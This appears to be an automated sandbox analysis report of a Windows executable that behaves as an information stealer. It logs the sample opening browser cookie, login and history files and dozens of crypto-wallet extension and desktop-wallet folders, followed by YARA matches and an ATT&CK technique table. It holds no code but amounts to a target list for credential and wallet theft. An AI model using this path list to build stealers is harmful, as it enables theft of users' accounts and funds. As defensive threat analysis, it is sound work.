              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              34
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
